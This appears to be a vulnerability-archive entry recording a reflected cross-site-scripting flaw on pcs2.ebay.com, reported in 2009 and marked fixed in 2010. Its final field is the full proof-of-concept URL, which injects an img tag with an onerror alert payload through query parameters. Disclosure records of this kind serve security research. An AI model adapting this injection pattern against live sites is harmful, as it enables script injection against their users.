Security researcher Mystick, has submitted on 07/02/2009 a cross-site-scripting (XSS) vulnerability affecting pcs2.ebay.com, which at the time of submission ranked 20 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/02/2009. It is currently fixed. |
Date submitted: 07/02/2009 |
Date published: 16/02/2009 |
Date fixed: 24/01/2010 | Status: FIXED |
Author: Mystick |
Domain: pcs2.ebay.com |
Category: XSS |
Pagerank: 20 |
URL: http://pcs2.ebay.com/getcontent.php?ct=BB0V6%22%3Cmarquee%3E%3Cimg%20src=k.png%20onerror=alert(/XSS/ )%20/%3E&k=rolls%20royce&uniquekey=95440.88435359299%22%3Cmarquee%3E%3Cimg%20src=k.png%20onerror=ale rt(/XSS/)%20/%3E |
Click here to view the mirror
|
|
|